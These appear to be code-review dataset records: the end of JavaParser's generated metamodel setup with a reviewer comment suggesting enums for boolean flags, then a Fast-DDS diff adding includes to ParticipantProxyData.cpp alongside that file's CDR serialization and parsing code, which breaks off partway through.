classOrInterfaceTypeMetaModel.getDeclaredPropertyMetaModels().add(classOrInterfaceTypeMetaModel.scopePropertyMetaModel);
classOrInterfaceTypeMetaModel.typeArgumentsPropertyMetaModel = new PropertyMetaModel(classOrInterfaceTypeMetaModel, "typeArguments", com.github.javaparser.ast.type.Type.class, Optional.of(typeMetaModel), true, false, true, false, false);
classOrInterfaceTypeMetaModel.getDeclaredPropertyMetaModels().add(classOrInterfaceTypeMetaModel.typeArgumentsPropertyMetaModel);
classOrInterfaceTypeMetaModel.usingDiamondOperatorPropertyMetaModel = new PropertyMetaModel(classOrInterfaceTypeMetaModel, "usingDiamondOperator", boolean.class, Optional.empty(), false, false, false, false, false);
classOrInterfaceTypeMetaModel.getDerivedPropertyMetaModels().add(classOrInterfaceTypeMetaModel.usingDiamondOperatorPropertyMetaModel);
intersectionTypeMetaModel.elementsPropertyMetaModel = new PropertyMetaModel(intersectionTypeMetaModel, "elements", com.github.javaparser.ast.type.ReferenceType.class, Optional.of(referenceTypeMetaModel), false, true, true, false, true);
intersectionTypeMetaModel.getDeclaredPropertyMetaModels().add(intersectionTypeMetaModel.elementsPropertyMetaModel);
primitiveTypeMetaModel.typePropertyMetaModel = new PropertyMetaModel(primitiveTypeMetaModel, "type", com.github.javaparser.ast.type.PrimitiveType.Primitive.class, Optional.empty(), false, false, false, false, false);
primitiveTypeMetaModel.getDeclaredPropertyMetaModels().add(primitiveTypeMetaModel.typePropertyMetaModel);
typeParameterMetaModel.namePropertyMetaModel = new PropertyMetaModel(typeParameterMetaModel, "name", com.github.javaparser.ast.expr.SimpleName.class, Optional.of(simpleNameMetaModel), false, false, false, false, false);
typeParameterMetaModel.getDeclaredPropertyMetaModels().add(typeParameterMetaModel.namePropertyMetaModel);
typeParameterMetaModel.typeBoundPropertyMetaModel = new PropertyMetaModel(typeParameterMetaModel, "typeBound", com.github.javaparser.ast.type.ClassOrInterfaceType.class, Optional.of(classOrInterfaceTypeMetaModel), false, false, true, false, false);
typeParameterMetaModel.getDeclaredPropertyMetaModels().add(typeParameterMetaModel.typeBoundPropertyMetaModel);
unionTypeMetaModel.elementsPropertyMetaModel = new PropertyMetaModel(unionTypeMetaModel, "elements", com.github.javaparser.ast.type.ReferenceType.class, Optional.of(referenceTypeMetaModel), false, true, true, false, true);
unionTypeMetaModel.getDeclaredPropertyMetaModels().add(unionTypeMetaModel.elementsPropertyMetaModel);
wildcardTypeMetaModel.extendedTypePropertyMetaModel = new PropertyMetaModel(wildcardTypeMetaModel, "extendedType", com.github.javaparser.ast.type.ReferenceType.class, Optional.of(referenceTypeMetaModel), true, false, false, false, false);
wildcardTypeMetaModel.getDeclaredPropertyMetaModels().add(wildcardTypeMetaModel.extendedTypePropertyMetaModel);
wildcardTypeMetaModel.superTypePropertyMetaModel = new PropertyMetaModel(wildcardTypeMetaModel, "superType", com.github.javaparser.ast.type.ReferenceType.class, Optional.of(referenceTypeMetaModel), true, false, false, false, false);
wildcardTypeMetaModel.getDeclaredPropertyMetaModels().add(wildcardTypeMetaModel.superTypePropertyMetaModel);
moduleRequiresStmtMetaModel.modifiersPropertyMetaModel = new PropertyMetaModel(moduleRequiresStmtMetaModel, "modifiers", com.github.javaparser.ast.Modifier.class, Optional.empty(), false, false, false, true, false);
moduleRequiresStmtMetaModel.getDeclaredPropertyMetaModels().add(moduleRequiresStmtMetaModel.modifiersPropertyMetaModel);
moduleRequiresStmtMetaModel.namePropertyMetaModel = new PropertyMetaModel(moduleRequiresStmtMetaModel, "name", com.github.javaparser.ast.expr.Name.class, Optional.of(nameMetaModel), false, false, false, false, false);
moduleRequiresStmtMetaModel.getDeclaredPropertyMetaModels().add(moduleRequiresStmtMetaModel.namePropertyMetaModel);
moduleExportsStmtMetaModel.moduleNamesPropertyMetaModel = new PropertyMetaModel(moduleExportsStmtMetaModel, "moduleNames", com.github.javaparser.ast.expr.Name.class, Optional.of(nameMetaModel), false, false, true, false, false);
moduleExportsStmtMetaModel.getDeclaredPropertyMetaModels().add(moduleExportsStmtMetaModel.moduleNamesPropertyMetaModel);
moduleExportsStmtMetaModel.namePropertyMetaModel = new PropertyMetaModel(moduleExportsStmtMetaModel, "name", com.github.javaparser.ast.expr.Name.class, Optional.of(nameMetaModel), false, false, false, false, false);
moduleExportsStmtMetaModel.getDeclaredPropertyMetaModels().add(moduleExportsStmtMetaModel.namePropertyMetaModel);
moduleProvidesStmtMetaModel.typePropertyMetaModel = new PropertyMetaModel(moduleProvidesStmtMetaModel, "type", com.github.javaparser.ast.type.Type.class, Optional.of(typeMetaModel), false, false, false, false, false);
moduleProvidesStmtMetaModel.getDeclaredPropertyMetaModels().add(moduleProvidesStmtMetaModel.typePropertyMetaModel);
moduleProvidesStmtMetaModel.withTypesPropertyMetaModel = new PropertyMetaModel(moduleProvidesStmtMetaModel, "withTypes", com.github.javaparser.ast.type.Type.class, Optional.of(typeMetaModel), false, false, true, false, false);
moduleProvidesStmtMetaModel.getDeclaredPropertyMetaModels().add(moduleProvidesStmtMetaModel.withTypesPropertyMetaModel);
moduleUsesStmtMetaModel.typePropertyMetaModel = new PropertyMetaModel(moduleUsesStmtMetaModel, "type", com.github.javaparser.ast.type.Type.class, Optional.of(typeMetaModel), false, false, false, false, false);
moduleUsesStmtMetaModel.getDeclaredPropertyMetaModels().add(moduleUsesStmtMetaModel.typePropertyMetaModel);
moduleOpensStmtMetaModel.moduleNamesPropertyMetaModel = new PropertyMetaModel(moduleOpensStmtMetaModel, "moduleNames", com.github.javaparser.ast.expr.Name.class, Optional.of(nameMetaModel), false, false, true, false, false);
moduleOpensStmtMetaModel.getDeclaredPropertyMetaModels().add(moduleOpensStmtMetaModel.moduleNamesPropertyMetaModel);
moduleOpensStmtMetaModel.namePropertyMetaModel = new PropertyMetaModel(moduleOpensStmtMetaModel, "name", com.github.javaparser.ast.expr.Name.class, Optional.of(nameMetaModel), false, false, false, false, false);
moduleOpensStmtMetaModel.getDeclaredPropertyMetaModels().add(moduleOpensStmtMetaModel.namePropertyMetaModel);
}
public static Optional<BaseNodeMetaModel> getNodeMetaModel(Class<? extends Node> c) {
for (BaseNodeMetaModel nodeMetaModel : nodeMetaModels) {
if (nodeMetaModel.getTypeNameGenerified().equals(c.getSimpleName())) {
return Optional.of(nodeMetaModel);
}
}
return Optional.empty();
}
public static final NodeMetaModel nodeMetaModel = new NodeMetaModel(Optional.empty());
public static final BodyDeclarationMetaModel bodyDeclarationMetaModel = new BodyDeclarationMetaModel(Optional.of(nodeMetaModel));
public static final CallableDeclarationMetaModel callableDeclarationMetaModel = new CallableDeclarationMetaModel(Optional.of(bodyDeclarationMetaModel));
public static final StatementMetaModel statementMetaModel = new StatementMetaModel(Optional.of(nodeMetaModel));
public static final ExpressionMetaModel expressionMetaModel = new ExpressionMetaModel(Optional.of(nodeMetaModel));
public static final TypeMetaModel typeMetaModel = new TypeMetaModel(Optional.of(nodeMetaModel));
public static final AnnotationExprMetaModel annotationExprMetaModel = new AnnotationExprMetaModel(Optional.of(expressionMetaModel));
public static final TypeDeclarationMetaModel typeDeclarationMetaModel = new TypeDeclarationMetaModel(Optional.of(bodyDeclarationMetaModel));
public static final ReferenceTypeMetaModel referenceTypeMetaModel = new ReferenceTypeMetaModel(Optional.of(typeMetaModel));
public static final LiteralExprMetaModel literalExprMetaModel = new LiteralExprMetaModel(Optional.of(expressionMetaModel));
public static final LiteralStringValueExprMetaModel literalStringValueExprMetaModel = new LiteralStringValueExprMetaModel(Optional.of(literalExprMetaModel));
public static final StringLiteralExprMetaModel stringLiteralExprMetaModel = new StringLiteralExprMetaModel(Optional.of(literalStringValueExprMetaModel));
public static final ModuleDeclarationMetaModel moduleDeclarationMetaModel = new ModuleDeclarationMetaModel(Optional.of(nodeMetaModel));
public static final ModuleStmtMetaModel moduleStmtMetaModel = new ModuleStmtMetaModel(Optional.of(nodeMetaModel));
public static final ArrayCreationLevelMetaModel arrayCreationLevelMetaModel = new ArrayCreationLevelMetaModel(Optional.of(nodeMetaModel));
public static final CompilationUnitMetaModel compilationUnitMetaModel = new CompilationUnitMetaModel(Optional.of(nodeMetaModel));
public static final PackageDeclarationMetaModel packageDeclarationMetaModel = new PackageDeclarationMetaModel(Optional.of(nodeMetaModel));
public static final AnnotationDeclarationMetaModel annotationDeclarationMetaModel = new AnnotationDeclarationMetaModel(Optional.of(typeDeclarationMetaModel));
public static final AnnotationMemberDeclarationMetaModel annotationMemberDeclarationMetaModel = new AnnotationMemberDeclarationMetaModel(Optional.of(bodyDeclarationMetaModel));
public static final ClassOrInterfaceDeclarationMetaModel classOrInterfaceDeclarationMetaModel = new ClassOrInterfaceDeclarationMetaModel(Optional.of(typeDeclarationMetaModel));
public static final ConstructorDeclarationMetaModel constructorDeclarationMetaModel = new ConstructorDeclarationMetaModel(Optional.of(callableDeclarationMetaModel));
public static final EmptyMemberDeclarationMetaModel emptyMemberDeclarationMetaModel = new EmptyMemberDeclarationMetaModel(Optional.of(bodyDeclarationMetaModel));
public static final EnumConstantDeclarationMetaModel enumConstantDeclarationMetaModel = new EnumConstantDeclarationMetaModel(Optional.of(bodyDeclarationMetaModel));
public static final EnumDeclarationMetaModel enumDeclarationMetaModel = new EnumDeclarationMetaModel(Optional.of(typeDeclarationMetaModel));
public static final FieldDeclarationMetaModel fieldDeclarationMetaModel = new FieldDeclarationMetaModel(Optional.of(bodyDeclarationMetaModel));
public static final InitializerDeclarationMetaModel initializerDeclarationMetaModel = new InitializerDeclarationMetaModel(Optional.of(bodyDeclarationMetaModel));
public static final MethodDeclarationMetaModel methodDeclarationMetaModel = new MethodDeclarationMetaModel(Optional.of(callableDeclarationMetaModel));
public static final ParameterMetaModel parameterMetaModel = new ParameterMetaModel(Optional.of(nodeMetaModel));
public static final VariableDeclaratorMetaModel variableDeclaratorMetaModel = new VariableDeclaratorMetaModel(Optional.of(nodeMetaModel));
public static final CommentMetaModel commentMetaModel = new CommentMetaModel(Optional.of(nodeMetaModel));
public static final BlockCommentMetaModel blockCommentMetaModel = new BlockCommentMetaModel(Optional.of(commentMetaModel));
public static final JavadocCommentMetaModel javadocCommentMetaModel = new JavadocCommentMetaModel(Optional.of(commentMetaModel));
public static final LineCommentMetaModel lineCommentMetaModel = new LineCommentMetaModel(Optional.of(commentMetaModel));
public static final ArrayAccessExprMetaModel arrayAccessExprMetaModel = new ArrayAccessExprMetaModel(Optional.of(expressionMetaModel));
public static final ArrayCreationExprMetaModel arrayCreationExprMetaModel = new ArrayCreationExprMetaModel(Optional.of(expressionMetaModel));
public static final ArrayInitializerExprMetaModel arrayInitializerExprMetaModel = new ArrayInitializerExprMetaModel(Optional.of(expressionMetaModel));
public static final AssignExprMetaModel assignExprMetaModel = new AssignExprMetaModel(Optional.of(expressionMetaModel));
public static final BinaryExprMetaModel binaryExprMetaModel = new BinaryExprMetaModel(Optional.of(expressionMetaModel));
public static final BooleanLiteralExprMetaModel booleanLiteralExprMetaModel = new BooleanLiteralExprMetaModel(Optional.of(literalExprMetaModel));
public static final CastExprMetaModel castExprMetaModel = new CastExprMetaModel(Optional.of(expressionMetaModel));
public static final CharLiteralExprMetaModel charLiteralExprMetaModel = new CharLiteralExprMetaModel(Optional.of(literalStringValueExprMetaModel));
public static final ClassExprMetaModel classExprMetaModel = new ClassExprMetaModel(Optional.of(expressionMetaModel));
public static final ConditionalExprMetaModel conditionalExprMetaModel = new ConditionalExprMetaModel(Optional.of(expressionMetaModel));
public static final DoubleLiteralExprMetaModel doubleLiteralExprMetaModel = new DoubleLiteralExprMetaModel(Optional.of(literalStringValueExprMetaModel));
public static final EnclosedExprMetaModel enclosedExprMetaModel = new EnclosedExprMetaModel(Optional.of(expressionMetaModel));
public static final FieldAccessExprMetaModel fieldAccessExprMetaModel = new FieldAccessExprMetaModel(Optional.of(expressionMetaModel));
public static final InstanceOfExprMetaModel instanceOfExprMetaModel = new InstanceOfExprMetaModel(Optional.of(expressionMetaModel));
public static final IntegerLiteralExprMetaModel integerLiteralExprMetaModel = new IntegerLiteralExprMetaModel(Optional.of(literalStringValueExprMetaModel));
public static final LambdaExprMetaModel lambdaExprMetaModel = new LambdaExprMetaModel(Optional.of(expressionMetaModel));
public static final LongLiteralExprMetaModel longLiteralExprMetaModel = new LongLiteralExprMetaModel(Optional.of(literalStringValueExprMetaModel));
public static final MarkerAnnotationExprMetaModel markerAnnotationExprMetaModel = new MarkerAnnotationExprMetaModel(Optional.of(annotationExprMetaModel));
public static final MemberValuePairMetaModel memberValuePairMetaModel = new MemberValuePairMetaModel(Optional.of(nodeMetaModel));
public static final MethodCallExprMetaModel methodCallExprMetaModel = new MethodCallExprMetaModel(Optional.of(expressionMetaModel));
public static final MethodReferenceExprMetaModel methodReferenceExprMetaModel = new MethodReferenceExprMetaModel(Optional.of(expressionMetaModel));
public static final NameExprMetaModel nameExprMetaModel = new NameExprMetaModel(Optional.of(expressionMetaModel));
public static final NameMetaModel nameMetaModel = new NameMetaModel(Optional.of(nodeMetaModel));
public static final NormalAnnotationExprMetaModel normalAnnotationExprMetaModel = new NormalAnnotationExprMetaModel(Optional.of(annotationExprMetaModel));
public static final NullLiteralExprMetaModel nullLiteralExprMetaModel = new NullLiteralExprMetaModel(Optional.of(literalExprMetaModel));
public static final ObjectCreationExprMetaModel objectCreationExprMetaModel = new ObjectCreationExprMetaModel(Optional.of(expressionMetaModel));
public static final SimpleNameMetaModel simpleNameMetaModel = new SimpleNameMetaModel(Optional.of(nodeMetaModel));
public static final SingleMemberAnnotationExprMetaModel singleMemberAnnotationExprMetaModel = new SingleMemberAnnotationExprMetaModel(Optional.of(annotationExprMetaModel));
public static final SuperExprMetaModel superExprMetaModel = new SuperExprMetaModel(Optional.of(expressionMetaModel));
public static final ThisExprMetaModel thisExprMetaModel = new ThisExprMetaModel(Optional.of(expressionMetaModel));
public static final TypeExprMetaModel typeExprMetaModel = new TypeExprMetaModel(Optional.of(expressionMetaModel));
public static final UnaryExprMetaModel unaryExprMetaModel = new UnaryExprMetaModel(Optional.of(expressionMetaModel));
public static final VariableDeclarationExprMetaModel variableDeclarationExprMetaModel = new VariableDeclarationExprMetaModel(Optional.of(expressionMetaModel));
public static final ImportDeclarationMetaModel importDeclarationMetaModel = new ImportDeclarationMetaModel(Optional.of(nodeMetaModel));
public static final AssertStmtMetaModel assertStmtMetaModel = new AssertStmtMetaModel(Optional.of(statementMetaModel));
public static final BlockStmtMetaModel blockStmtMetaModel = new BlockStmtMetaModel(Optional.of(statementMetaModel));
public static final BreakStmtMetaModel breakStmtMetaModel = new BreakStmtMetaModel(Optional.of(statementMetaModel));
public static final CatchClauseMetaModel catchClauseMetaModel = new CatchClauseMetaModel(Optional.of(nodeMetaModel));
public static final ContinueStmtMetaModel continueStmtMetaModel = new ContinueStmtMetaModel(Optional.of(statementMetaModel));
public static final DoStmtMetaModel doStmtMetaModel = new DoStmtMetaModel(Optional.of(statementMetaModel));
public static final EmptyStmtMetaModel emptyStmtMetaModel = new EmptyStmtMetaModel(Optional.of(statementMetaModel));
public static final ExplicitConstructorInvocationStmtMetaModel explicitConstructorInvocationStmtMetaModel = new ExplicitConstructorInvocationStmtMetaModel(Optional.of(statementMetaModel));
public static final ExpressionStmtMetaModel expressionStmtMetaModel = new ExpressionStmtMetaModel(Optional.of(statementMetaModel));
public static final ForeachStmtMetaModel foreachStmtMetaModel = new ForeachStmtMetaModel(Optional.of(statementMetaModel));
public static final ForStmtMetaModel forStmtMetaModel = new ForStmtMetaModel(Optional.of(statementMetaModel));
public static final IfStmtMetaModel ifStmtMetaModel = new IfStmtMetaModel(Optional.of(statementMetaModel));
public static final LabeledStmtMetaModel labeledStmtMetaModel = new LabeledStmtMetaModel(Optional.of(statementMetaModel));
public static final ReturnStmtMetaModel returnStmtMetaModel = new ReturnStmtMetaModel(Optional.of(statementMetaModel));
public static final SwitchEntryStmtMetaModel switchEntryStmtMetaModel = new SwitchEntryStmtMetaModel(Optional.of(statementMetaModel));
public static final SwitchStmtMetaModel switchStmtMetaModel = new SwitchStmtMetaModel(Optional.of(statementMetaModel));
public static final SynchronizedStmtMetaModel synchronizedStmtMetaModel = new SynchronizedStmtMetaModel(Optional.of(statementMetaModel));
public static final ThrowStmtMetaModel throwStmtMetaModel = new ThrowStmtMetaModel(Optional.of(statementMetaModel));
public static final TryStmtMetaModel tryStmtMetaModel = new TryStmtMetaModel(Optional.of(statementMetaModel));
public static final LocalClassDeclarationStmtMetaModel localClassDeclarationStmtMetaModel = new LocalClassDeclarationStmtMetaModel(Optional.of(statementMetaModel));
public static final WhileStmtMetaModel whileStmtMetaModel = new WhileStmtMetaModel(Optional.of(statementMetaModel));
public static final ArrayTypeMetaModel arrayTypeMetaModel = new ArrayTypeMetaModel(Optional.of(referenceTypeMetaModel));
public static final ClassOrInterfaceTypeMetaModel classOrInterfaceTypeMetaModel = new ClassOrInterfaceTypeMetaModel(Optional.of(referenceTypeMetaModel));
public static final IntersectionTypeMetaModel intersectionTypeMetaModel = new IntersectionTypeMetaModel(Optional.of(typeMetaModel));
public static final PrimitiveTypeMetaModel primitiveTypeMetaModel = new PrimitiveTypeMetaModel(Optional.of(typeMetaModel));
public static final TypeParameterMetaModel typeParameterMetaModel = new TypeParameterMetaModel(Optional.of(referenceTypeMetaModel));
public static final UnionTypeMetaModel unionTypeMetaModel = new UnionTypeMetaModel(Optional.of(typeMetaModel));
public static final UnknownTypeMetaModel unknownTypeMetaModel = new UnknownTypeMetaModel(Optional.of(typeMetaModel));
public static final VoidTypeMetaModel voidTypeMetaModel = new VoidTypeMetaModel(Optional.of(typeMetaModel));
public static final WildcardTypeMetaModel wildcardTypeMetaModel = new WildcardTypeMetaModel(Optional.of(typeMetaModel));
public static final ModuleRequiresStmtMetaModel moduleRequiresStmtMetaModel = new ModuleRequiresStmtMetaModel(Optional.of(moduleStmtMetaModel));
public static final ModuleExportsStmtMetaModel moduleExportsStmtMetaModel = new ModuleExportsStmtMetaModel(Optional.of(moduleStmtMetaModel));
public static final ModuleProvidesStmtMetaModel moduleProvidesStmtMetaModel = new ModuleProvidesStmtMetaModel(Optional.of(moduleStmtMetaModel));
public static final ModuleUsesStmtMetaModel moduleUsesStmtMetaModel = new ModuleUsesStmtMetaModel(Optional.of(moduleStmtMetaModel));
public static final ModuleOpensStmtMetaModel moduleOpensStmtMetaModel = new ModuleOpensStmtMetaModel(Optional.of(moduleStmtMetaModel));
static {
initializeNodeMetaModels();
initializePropertyMetaModels();
initializeConstructorParameters();
}
}
| 1 | 10,997 | Looking at this list of boolean flags I wonder if we should create enums for all of these options, so that the code becomes much more readable | javaparser-javaparser | java |
@@ -29,8 +29,11 @@
#include <fastrtps/qos/QosPolicies.h>
#include <fastrtps/utils/TimeConversion.h>
+#include <rtps/builtin/data/ProxyHashTables.hpp>
+
#include <mutex>
#include <chrono>
+#include <unordered_set>
using namespace eprosima::fastrtps;
| 1 | // Copyright 2016 Proyectos y Sistemas de Mantenimiento SL (eProsima).
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
/**
* @file ParticipantProxyData.cpp
*
*/
#include <fastrtps_deprecated/participant/ParticipantImpl.h>
#include <fastdds/rtps/builtin/data/ParticipantProxyData.h>
#include <fastdds/rtps/builtin/data/WriterProxyData.h>
#include <fastdds/rtps/builtin/data/ReaderProxyData.h>
#include <fastdds/rtps/builtin/discovery/participant/PDPSimple.h>
#include <fastdds/rtps/resources/TimedEvent.h>
#include <fastdds/rtps/builtin/BuiltinProtocols.h>
#include <fastdds/rtps/network/NetworkFactory.h>
#include <fastrtps/log/Log.h>
#include <fastrtps/qos/QosPolicies.h>
#include <fastrtps/utils/TimeConversion.h>
#include <mutex>
#include <chrono>
using namespace eprosima::fastrtps;
namespace eprosima {
namespace fastrtps {
namespace rtps {
ParticipantProxyData::ParticipantProxyData(
const RTPSParticipantAllocationAttributes& allocation)
: m_protocolVersion(c_ProtocolVersion)
, m_VendorId(c_VendorId_Unknown)
, m_expectsInlineQos(false)
, m_availableBuiltinEndpoints(0)
, metatraffic_locators(allocation.locators.max_unicast_locators, allocation.locators.max_multicast_locators)
, default_locators(allocation.locators.max_unicast_locators, allocation.locators.max_multicast_locators)
#if HAVE_SECURITY
, security_attributes_(0UL)
, plugin_security_attributes_(0UL)
#endif
, isAlive(false)
, lease_duration_event(nullptr)
, should_check_lease_duration(false)
, m_readers(allocation.readers)
, m_writers(allocation.writers)
{
}
ParticipantProxyData::ParticipantProxyData(
const ParticipantProxyData& pdata)
: m_protocolVersion(pdata.m_protocolVersion)
, m_guid(pdata.m_guid)
, m_VendorId(pdata.m_VendorId)
, m_expectsInlineQos(pdata.m_expectsInlineQos)
, m_availableBuiltinEndpoints(pdata.m_availableBuiltinEndpoints)
, metatraffic_locators(pdata.metatraffic_locators)
, default_locators(pdata.default_locators)
, m_participantName(pdata.m_participantName)
, m_key(pdata.m_key)
, m_leaseDuration(pdata.m_leaseDuration)
#if HAVE_SECURITY
, identity_token_(pdata.identity_token_)
, permissions_token_(pdata.permissions_token_)
, security_attributes_(pdata.security_attributes_)
, plugin_security_attributes_(pdata.plugin_security_attributes_)
#endif
, isAlive(pdata.isAlive)
, m_properties(pdata.m_properties)
, m_userData(pdata.m_userData)
, lease_duration_event(nullptr)
, should_check_lease_duration(false)
, lease_duration_(std::chrono::microseconds(TimeConv::Duration_t2MicroSecondsInt64(pdata.m_leaseDuration)))
// This method is only called from SecurityManager when a new participant is discovered and the
// corresponding DiscoveredParticipantInfo struct is created. Only participant info is used,
// so there is no need to copy m_readers and m_writers
{
}
ParticipantProxyData::~ParticipantProxyData()
{
logInfo(RTPS_PARTICIPANT, m_guid);
for (ReaderProxyData* it : m_readers)
{
delete it;
}
for (WriterProxyData* it : m_writers)
{
delete it;
}
if (lease_duration_event != nullptr)
{
delete lease_duration_event;
}
}
bool ParticipantProxyData::writeToCDRMessage(
CDRMessage_t* msg,
bool write_encapsulation)
{
if (write_encapsulation)
{
if (!ParameterList::writeEncapsulationToCDRMsg(msg))
{
return false;
}
}
{
ParameterProtocolVersion_t p(fastdds::dds::PID_PROTOCOL_VERSION, 4);
p.protocolVersion = this->m_protocolVersion;
if (!p.addToCDRMessage(msg))
{
return false;
}
}
{
ParameterVendorId_t p(fastdds::dds::PID_VENDORID, 4);
p.vendorId[0] = this->m_VendorId[0];
p.vendorId[1] = this->m_VendorId[1];
if (!p.addToCDRMessage(msg))
{
return false;
}
}
if (this->m_expectsInlineQos)
{
ParameterBool_t p(fastdds::dds::PID_EXPECTS_INLINE_QOS, PARAMETER_BOOL_LENGTH, m_expectsInlineQos);
if (!p.addToCDRMessage(msg))
{
return false;
}
}
{
ParameterGuid_t p(fastdds::dds::PID_PARTICIPANT_GUID, PARAMETER_GUID_LENGTH, m_guid);
if (!p.addToCDRMessage(msg))
{
return false;
}
}
for (const Locator_t& it : metatraffic_locators.multicast)
{
ParameterLocator_t p(fastdds::dds::PID_METATRAFFIC_MULTICAST_LOCATOR, PARAMETER_LOCATOR_LENGTH, it);
if (!p.addToCDRMessage(msg))
{
return false;
}
}
for (const Locator_t& it : metatraffic_locators.unicast)
{
ParameterLocator_t p(fastdds::dds::PID_METATRAFFIC_UNICAST_LOCATOR, PARAMETER_LOCATOR_LENGTH, it);
if (!p.addToCDRMessage(msg))
{
return false;
}
}
for (const Locator_t& it : default_locators.unicast)
{
ParameterLocator_t p(fastdds::dds::PID_DEFAULT_UNICAST_LOCATOR, PARAMETER_LOCATOR_LENGTH, it);
if (!p.addToCDRMessage(msg))
{
return false;
}
}
for (const Locator_t& it : default_locators.multicast)
{
ParameterLocator_t p(fastdds::dds::PID_DEFAULT_MULTICAST_LOCATOR, PARAMETER_LOCATOR_LENGTH, it);
if (!p.addToCDRMessage(msg))
{
return false;
}
}
{
ParameterTime_t p(fastdds::dds::PID_PARTICIPANT_LEASE_DURATION, PARAMETER_TIME_LENGTH);
p.time = m_leaseDuration;
if (!p.addToCDRMessage(msg))
{
return false;
}
}
{
ParameterBuiltinEndpointSet_t p(fastdds::dds::PID_BUILTIN_ENDPOINT_SET, PARAMETER_BUILTINENDPOINTSET_LENGTH);
p.endpointSet = m_availableBuiltinEndpoints;
if (!p.addToCDRMessage(msg))
{
return false;
}
}
if (m_participantName.size() > 0)
{
ParameterString_t p(fastdds::dds::PID_ENTITY_NAME, 0, m_participantName);
if (!p.addToCDRMessage(msg))
{
return false;
}
}
if (this->m_userData.size() > 0)
{
UserDataQosPolicy p;
p.data_vec(m_userData);
if (!p.addToCDRMessage(msg))
{
return false;
}
}
if (this->m_properties.properties.size() > 0)
{
ParameterPropertyList_t p(m_properties);
if (!p.addToCDRMessage(msg))
{
return false;
}
}
#if HAVE_SECURITY
if (!this->identity_token_.class_id().empty())
{
ParameterToken_t p(fastdds::dds::PID_IDENTITY_TOKEN, 0);
p.token = identity_token_;
if (!p.addToCDRMessage(msg))
{
return false;
}
}
if (!this->permissions_token_.class_id().empty())
{
ParameterToken_t p(fastdds::dds::PID_PERMISSIONS_TOKEN, 0);
p.token = permissions_token_;
if (!p.addToCDRMessage(msg))
{
return false;
}
}
if ((this->security_attributes_ != 0UL) || (this->plugin_security_attributes_ != 0UL))
{
ParameterParticipantSecurityInfo_t p;
p.security_attributes = this->security_attributes_;
p.plugin_security_attributes = this->plugin_security_attributes_;
if (!p.addToCDRMessage(msg))
{
return false;
}
}
#endif
return CDRMessage::addParameterSentinel(msg);
}
bool ParticipantProxyData::readFromCDRMessage(
CDRMessage_t* msg,
bool use_encapsulation,
const NetworkFactory& network)
{
auto param_process = [this, &network](const Parameter_t* param)
{
switch (param->Pid)
{
case fastdds::dds::PID_KEY_HASH:
{
const ParameterKey_t* p = dynamic_cast<const ParameterKey_t*>(param);
assert(p != nullptr);
GUID_t guid;
iHandle2GUID(guid, p->key);
this->m_guid = guid;
this->m_key = p->key;
break;
}
case fastdds::dds::PID_PROTOCOL_VERSION:
{
const ParameterProtocolVersion_t* p = dynamic_cast<const ParameterProtocolVersion_t*>(param);
assert(p != nullptr);
if (p->protocolVersion.m_major < c_ProtocolVersion.m_major)
{
return false;
}
this->m_protocolVersion = p->protocolVersion;
break;
}
case fastdds::dds::PID_VENDORID:
{
const ParameterVendorId_t* p = dynamic_cast<const ParameterVendorId_t*>(param);
assert(p != nullptr);
this->m_VendorId[0] = p->vendorId[0];
this->m_VendorId[1] = p->vendorId[1];
break;
}
case fastdds::dds::PID_EXPECTS_INLINE_QOS:
{
const ParameterBool_t* p = dynamic_cast<const ParameterBool_t*>(param);
assert(p != nullptr);
this->m_expectsInlineQos = p->value;
break;
}
case fastdds::dds::PID_PARTICIPANT_GUID:
{
const ParameterGuid_t* p = dynamic_cast<const ParameterGuid_t*>(param);
assert(p != nullptr);
this->m_guid = p->guid;
this->m_key = p->guid;
break;
}
case fastdds::dds::PID_METATRAFFIC_MULTICAST_LOCATOR:
{
const ParameterLocator_t* p = dynamic_cast<const ParameterLocator_t*>(param);
assert(p != nullptr);
Locator_t temp_locator;
if (network.transform_remote_locator(p->locator, temp_locator))
{
metatraffic_locators.add_multicast_locator(temp_locator);
}
break;
}
case fastdds::dds::PID_METATRAFFIC_UNICAST_LOCATOR:
{
const ParameterLocator_t* p = dynamic_cast<const ParameterLocator_t*>(param);
assert(p != nullptr);
Locator_t temp_locator;
if (network.transform_remote_locator(p->locator, temp_locator))
{
metatraffic_locators.add_unicast_locator(temp_locator);
}
break;
}
case fastdds::dds::PID_DEFAULT_UNICAST_LOCATOR:
{
const ParameterLocator_t* p = dynamic_cast<const ParameterLocator_t*>(param);
assert(p != nullptr);
Locator_t temp_locator;
if (network.transform_remote_locator(p->locator, temp_locator))
{
default_locators.add_unicast_locator(temp_locator);
}
break;
}
case fastdds::dds::PID_DEFAULT_MULTICAST_LOCATOR:
{
const ParameterLocator_t* p = dynamic_cast<const ParameterLocator_t*>(param);
assert(p != nullptr);
Locator_t temp_locator;
if (network.transform_remote_locator(p->locator, temp_locator))
{
default_locators.add_multicast_locator(temp_locator);
}
break;
}
case fastdds::dds::PID_PARTICIPANT_LEASE_DURATION:
{
const ParameterTime_t* p = dynamic_cast<const ParameterTime_t*>(param);
assert(p != nullptr);
this->m_leaseDuration = p->time.to_duration_t();
lease_duration_ =
std::chrono::microseconds(TimeConv::Duration_t2MicroSecondsInt64(m_leaseDuration));
break;
}
case fastdds::dds::PID_BUILTIN_ENDPOINT_SET:
{
const ParameterBuiltinEndpointSet_t* p =
dynamic_cast<const ParameterBuiltinEndpointSet_t*>(param);
assert(p != nullptr);
this->m_availableBuiltinEndpoints = p->endpointSet;
break;
}
case fastdds::dds::PID_ENTITY_NAME:
{
const ParameterString_t* p = dynamic_cast<const ParameterString_t*>(param);
assert(p != nullptr);
this->m_participantName = p->getName();
break;
}
case fastdds::dds::PID_PROPERTY_LIST:
{
const ParameterPropertyList_t* p = dynamic_cast<const ParameterPropertyList_t*>(param);
assert(p != nullptr);
this->m_properties = *p;
break;
}
case fastdds::dds::PID_USER_DATA:
{
const UserDataQosPolicy* p = dynamic_cast<const UserDataQosPolicy*>(param);
assert(p != nullptr);
this->m_userData = p->data_vec();
break;
}
case fastdds::dds::PID_IDENTITY_TOKEN:
{
#if HAVE_SECURITY
const ParameterToken_t* p = dynamic_cast<const ParameterToken_t*>(param);
assert(p != nullptr);
this->identity_token_ = std::move(p->token);
#else
